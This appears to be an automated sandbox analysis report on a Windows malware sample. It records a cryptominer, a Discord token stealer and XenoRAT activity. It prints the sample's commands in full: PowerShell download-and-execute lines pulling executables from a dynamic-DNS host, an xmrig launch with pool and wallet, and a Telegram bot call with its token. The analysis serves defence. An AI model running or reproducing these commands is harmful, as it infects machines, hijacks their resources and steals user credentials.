Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\1.exe "C:\Users\user\AppData\Roaming\1.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\process.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\ProgramData\Drivers\xmrig.exe xmrig.exe --donate-level 5 -o pool.supportxmr.com:443 -u 49LzTohDTP4MAvjfeeKB7pecfkp8MppQKZu5yjawPHfH2aJFbLhgV459XX9y3qoAmjJvxiewcw2bK2toFoMVEAQSLB878rm -k --tls -p speed
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Users\user\AppData\Roaming\1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\ping.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl "https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -outfile 'c:\users\user\appdata\roaming\6.exe'; c:\users\user\appdata\roaming\6.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -outfile 'c:\users\user\appdata\roaming\1.exe'; c:\users\user\appdata\roaming\1.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -outfile 'c:\users\user\appdata\roaming\2.exe'; c:\users\user\appdata\roaming\2.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -outfile 'c:\users\user\appdata\roaming\6.exe'; c:\users\user\appdata\roaming\6.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -outfile 'c:\users\user\appdata\roaming\1.exe'; c:\users\user\appdata\roaming\1.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -outfile 'c:\users\user\appdata\roaming\2.exe'; c:\users\user\appdata\roaming\2.exe" Jump to behavior
Source: conhost.exe, 00000014.00000002.3899647979.0000028475970000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000014.00000002.3899647979.0000028475970000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: conhost.exe, 00000014.00000002.3899647979.0000028475970000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: conhost.exe, 00000014.00000002.3899647979.0000028475970000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: yProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332D5540 cpuid 0_2_00007FF7332D5540
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_00007FF7332B9F2C
Source: C:\Users\user\AppData\Roaming\6.exe Code function: GetLocaleInfoW,GetNumberFormatW, 6_2_00007FF6C5729F2C
Source: C:\Users\user\AppData\Roaming\1.exe Code function: GetLocaleInfoEx,FormatMessageA, 27_2_00007FF7033FA04C
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: GetLocaleInfoW,GetNumberFormatW, 31_2_00007FF75C2C9F2C
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332C03B4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF7332C03B4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332A4C24 GetVersionExW, 0_2_00007FF7332A4C24
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Discord Token Stealer
Source: Yara match File source: Process Memory Space: 1.exe PID: 3664, type: MEMORYSTR
Yara detected XenoRAT
Source: Yara match File source: 00000034.00000002.1958573252.000001DDAA771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4120, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\2.exe, type: DROPPED
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log

Remote Access Functionality
barindex
Yara detected Discord Token Stealer
Source: Yara match File source: Process Memory Space: 1.exe PID: 3664, type: MEMORYSTR
Yara detected XenoRAT
Source: Yara match File source: 00000034.00000002.1958573252.000001DDAA771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4120, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\2.exe, type: DROPPED
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033F2524 socket,memset,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket, 27_2_00007FF7033F2524
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033DBBA0 memset,strlen,memset,strlen,strncmp,strlen,strlen,strncmp,strlen,inet_pton,htons,inet_pton,htons,htons,bind,htons,bind,memset,getsockname,WSAGetLastError,WSAGetLastError, 27_2_00007FF7033DBBA0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1416947 Sample: SecuriteInfo.com.Gen.Heur.J... Startdate: 28/03/2024 Architecture: WINDOWS Score: 100 107 puredgb.duckdns.org 2->107 109 api.telegram.org 2->109 111 2 other IPs or domains 2->111 117 Snort IDS alert for network traffic 2->117 119 Sigma detected: Xmrig 2->119 121 Multi AV Scanner detection for domain / URL 2->121 127 16 other signatures 2->127 15 SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe 3 9 2->15         started        18 rundll32.exe 2->18         started        signatures3 123 Uses dynamic DNS services 107->123 125 Uses the Telegram API (likely for C&C communication) 109->125 process4 file5 103 C:\Users\user\AppData\Local\Temp\down.vbs, ASCII 15->103 dropped 105 C:\Users\user\AppData\Local\Temp\down.bat, DOS 15->105 dropped 20 wscript.exe 1 15->20         started        process6 signatures7 129 Wscript starts Powershell (via cmd or directly) 20->129 131 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->131 133 Suspicious execution chain found 20->133 23 cmd.exe 1 20->23         started        process8 signatures9 145 Suspicious powershell command line found 23->145 147 Wscript starts Powershell (via cmd or directly) 23->147 26 powershell.exe 14 16 23->26         started        31 powershell.exe 23->31         started        33 powershell.exe 23->33         started        35 conhost.exe 23->35         started        process10 dnsIp11 115 puredgb.duckdns.org 200.165.100.3, 30000, 49704, 49705 TelemarNorteLesteSABR Brazil 26->115 97 C:\Users\user\AppData\Roaming\6.exe, PE32+ 26->97 dropped 151 Suspicious execution chain found 26->151 153 Powershell drops PE file 26->153 37 6.exe 20 26->37         started        99 C:\Users\user\AppData\Roaming\1.exe, PE32+ 31->99 dropped 41 1.exe 31->41         started        101 C:\Users\user\AppData\Roaming\2.exe, PE32 33->101 dropped file12 signatures13 process14 dnsIp15 87 C:\ProgramData\Drivers\xmrig.exe, PE32+ 37->87 dropped 89 C:\ProgramData\Drivers\WinRing0x64.sys, PE32+ 37->89 dropped 91 C:\ProgramData\Drivers\watch.bat, ASCII 37->91 dropped 93 C:\ProgramData\Drivers\process.bat, ASCII 37->93 dropped 135 Multi AV Scanner detection for dropped file 37->135 137 Found strings related to Crypto-Mining 37->137 139 Sample is not signed and drops a device driver 37->139 44 wscript.exe 1 37->44         started        113 127.0.0.1 unknown unknown 41->113 95 C:\Users\user\AppData\Local\Temp\tmp.vbs, PE32+ 41->95 dropped 141 Potential malicious VBS script found (suspicious strings) 41->141 143 Tries to harvest and steal browser information (history, passwords, etc) 41->143 47 cmd.exe 41->47         started        file16 signatures17 process18 signatures19 155 Wscript starts Powershell (via cmd or directly) 44->155 49 cmd.exe 2 44->49         started        51 tmp.vbs 47->51         started        54 conhost.exe 47->54         started        process20 file21 56 wscript.exe 49->56         started        59 cmd.exe 49->59         started        61 cmd.exe 49->61         started        65 24 other processes 49->65 85 C:\Users\user\AppData\Local\Temp\...\ping.bat, ASCII 51->85 dropped 63 wscript.exe 51->63         started        process22 signatures23 149 Wscript starts Powershell (via cmd or directly) 56->149 67 cmd.exe 56->67         started        69 tasklist.exe 59->69         started        71 tasklist.exe 61->71         started        73 cmd.exe 63->73         started        75 tasklist.exe 65->75         started        77 tasklist.exe 65->77         started        79 tasklist.exe 